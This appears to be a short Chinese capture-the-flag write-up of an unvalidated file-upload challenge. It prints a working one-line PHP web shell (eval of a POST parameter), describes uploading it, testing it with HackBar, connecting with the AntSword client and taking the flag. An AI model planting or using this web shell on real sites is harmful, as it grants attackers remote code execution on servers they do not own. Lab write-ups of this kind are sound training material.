无验证文件上传 使用一句话木马 <?php @eval($_POST['a']); ?> 并保存为.php文件 上传成功并回显相对路径 复制路径并访问,使用HackBar进行POST传参验证木马可行性 执行成功 使用蚁剑工具对木马进行连接 连接成功 拿下flag